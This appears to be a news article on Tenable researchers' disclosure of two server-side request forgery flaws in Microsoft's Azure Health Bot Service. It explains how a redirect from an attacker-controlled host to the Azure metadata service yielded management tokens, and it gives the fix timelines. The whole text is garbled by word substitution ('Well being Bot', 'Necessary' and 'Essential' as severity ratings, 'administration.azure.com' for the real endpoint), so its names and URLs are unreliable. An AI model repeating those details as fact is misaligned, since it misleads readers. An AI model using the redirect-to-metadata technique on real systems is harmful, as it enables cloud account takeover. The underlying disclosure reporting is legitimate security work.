Extreme vulnerabilities have been found in Microsoft’s AI healthcare chatbot service, permitting entry to consumer and buyer info, based on Tenable researchers.
The extent of entry granted by the vulnerabilities to the Azure Well being Bot Service, considered one of which is rated important, means it’s doubtless that lateral motion to different sources was potential.
Microsoft has utilized mitigations for the found vulnerabilities, with no buyer motion required.
Microsoft AI Chatbot Exploited
The Azure Well being Bot Service is a cloud platform that permits healthcare organizations to construct and deploy AI-powered digital assistants to cut back prices and enhance effectivity.
Whereas analyzing the service for safety points, Tenable researchers centered on a characteristic known as ‘Knowledge Connections’, which permits bots to work together with exterior knowledge sources to retrieve info from different providers that the supplier could also be utilizing, resembling a portal for affected person info.
This knowledge connection characteristic is designed to permit the service’s backend to make requests to third-party APIs.
Whereas testing these connections to see if they may work together with endpoints inside to the service, the researchers discovered that issuing redirect responses enabled them to bypass mitigations, resembling filtering, on these endpoints.
Two privilege escalation vulnerabilities had been uncovered as a part of this course of.
Essential Privilege Escalation Vulnerability
The primary vulnerability detailed by Tenable was a privilege escalation challenge exploited by through a server-side request forgery, assigned a CVE quantity CVE-2024-38109.
The researchers configured a knowledge connection inside Azure’s Inner Metadata Service (IMDS) situation editor to specify and exterior host underneath their management.
The researchers then configured this exterior host to reply to requests with a 301 redirect response destined for IMDS.
After receiving a legitimate metadata response, the researchers had been in a position to receive an entry token for administration.azure.com. This token enabled them to checklist the subscriptions they’d entry to through a name to https://administration.azure.com/subscriptions?api-version=2020-01-01, which supplied them with a subscription ID inside to Microsoft.
Tenable researchers might then checklist he sources they’d entry to through https://administration.azure.com/subscriptions/
The findings had been reported to Microsoft on June 17, 2024, and inside every week, fixes had been launched into affected environments. By July 2, fixes had been rolled out throughout all areas.
The repair for this flaw concerned rejecting redirect standing codes altogether for knowledge connection endpoints, which eradicated this assault vector.
Microsoft has assigned this vulnerability a severity score of Essential, confirming it could present cross tenant entry. It has been included in Microsoft’s August 2024 Patch Tuesday publication.
There isn’t any proof that the problem was exploited by a malicious actor.
Necessary Privilege Escalation Vulnerability
After Microsoft fastened the primary vulnerability, Tenable researchers discovered one other privilege escalation vulnerability contained within the Knowledge Connections characteristic of the Azure Well being Bot Service.
The researchers used the same server-side request forgery method to use the flaw, contained within the FHIR endpoint vector, which prescribes a format for accessing digital medical information sources and actions on the sources.
This vulnerability was much less extreme than the IMDS flaw, because it didn’t present cross tenant entry.
The flaw was reported to Microsoft on July 9, with fixes made accessible by July 12. The vulnerability has been rated as Necessary.
There isn’t any proof that the problem was exploited by malicious actors.
Prioritizing Safety in AI Fashions
The privilege escalation flaws relate to the underlying structure of the AI chatbot service relatively than the AI fashions themselves, the researchers famous.
Tenable stated that the discoveries spotlight the continued significance of conventional internet software and cloud safety mechanisms for AI-powered providers.
Learn now: 70% of Companies Prioritize Innovation Over Safety in Generative AI Tasks
In February 2024, Mozilla discovered that AI-powered “relationship” chatbots are intentionally ignoring privateness and safety greatest practices.